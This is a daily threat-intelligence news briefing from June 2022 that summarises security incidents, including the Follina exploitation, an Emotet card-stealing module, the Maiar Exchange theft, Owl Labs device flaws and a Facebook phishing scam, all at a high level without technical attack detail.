Cyware Daily Threat Intelligence

Daily Threat Briefing • Jun 9, 2022
This website uses cookies and similar technologies to provide essential functionality and improve your experience. Some features, such as demo scheduling and chat support, require marketing cookies to function. By clicking "Accept All", you consent to all cookies. Alternatively, you can customize your preferences, but note that declining marketing cookies will limit certain website features.
Daily Threat Briefing • Jun 9, 2022
Owl Labs announced a new firmware version for its existing devices that addresses a high-severity bug in devices manufactured by it. The bug lets an attacker pass through the networking traffic in Wi-Fi AP tethering mode to exploit targeted devices as wireless access points. Meanwhile, Follina continues to be a weak point for Microsoft users as new malware actors join the bandwagon to abuse the flaw.
In the last 24 hours, the threat landscape witnessed an ongoing major phishing scam aimed at billions of Facebook users. Active since September 2021, it has helped adversaries mint millions of USD.
Hundreds of millions stolen
The blockchain network at Maiar Exchange was breached to swindle 1.65 million EGLD tokens, (equivalent to an estimated $113 million) from three different wallets. The network was brought offline in the aftermath of the attack for a brief period of time. According to sources, most of the stolen funds have been either recovered or will be covered by the Elrond Foundation.
Zero-click hack against Ukraine officers?
Ukraine's State Special Communications Service confirmed that cybercriminals have started hijacking the phones of the country's public servants. Attackers are reportedly spreading malware in what may seem like a zero-click hack. A spokesperson said that, so far, no mobile devices have been compromised.
New Emotet variant cripples Chrome
Proofpoint has spotted a new series of attacks involving the infamous Emotet botnet. A new version of the botnet uses a new module to pilfer credit card information stored on the Chrome browser. The campaign was active from April 4–19. The email subjects used by hackers included easy words such as ‘Salary.’
Botnets march toward Linux-based Atlassian server
Linux servers running unpatched Atlassian Confluence Server and Data Center were found to be targeted by multiple botnet operators, namely Kinsing, Hezb, and s. The three groups are known for infiltrating vulnerable Linux servers to deploy backdoors and cryptominers. After the release of the PoC exploits, security experts have observed almost a ten-fold increase in active exploitation.
Bypassing 2FA by intercepting OTPs
Cybel exposed bot-based caller ID spoofing techniques used by cybercriminals to bypass 2FA and steal one-time passwords of the users. A majority of such interception services observed provided a user interface through Telegram and Discord-based bots. Once the OPT reaches the bot operators, they could illegally access the compromised service.
Owl Labs patches critical flaws
Video conferencing company Owl Labs has fixed a severe bug impacting its Meeting Owl Pro and Whiteboard Owl devices. An attacker within Bluetooth range can abuse the bug to turn a compromised device into a rogue access point. Security researchers at Modzero discovered five different vulnerabilities in Owl’s devices, however, the remaining flaws will be resolved with future updates.
AsyncRAT meets Follina
Follina, the recently disclosed Windows vulnerability identified as CVE-2022-30190, is being abused by several malware families, including AsyncRAT. Unfortunately, the flaw in the Microsoft Support Diagnostic Tool concerns all supported versions of Windows. For now, only advisories and workarounds are available to mitigate the vulnerability; a patch is being developed.
Advertising gimmick Firefox update
Malwarebytes unearthed a malvertising campaign leading to a fake Firefox update. Researchers noted that the malvertising infrastructure is essentially the same one that has been in use since late 2019. Furthermore, the campaign was distinct as, in some cases, hackers took a jibe at the same ad networks they were abusing, unless they named their malvertising gates after different ad networks.
Million-dollar worth of ad scams rock Facebook
Researchers with PIXM laid bare a massive phishing scam that abused Facebook and Messenger to trick millions of users into blurting out their account credentials while forcing them to see advertisements. While Facebook had preventive measures in place to curb the dissemination of phishing URLs, cybercriminals were able to bypass these protections.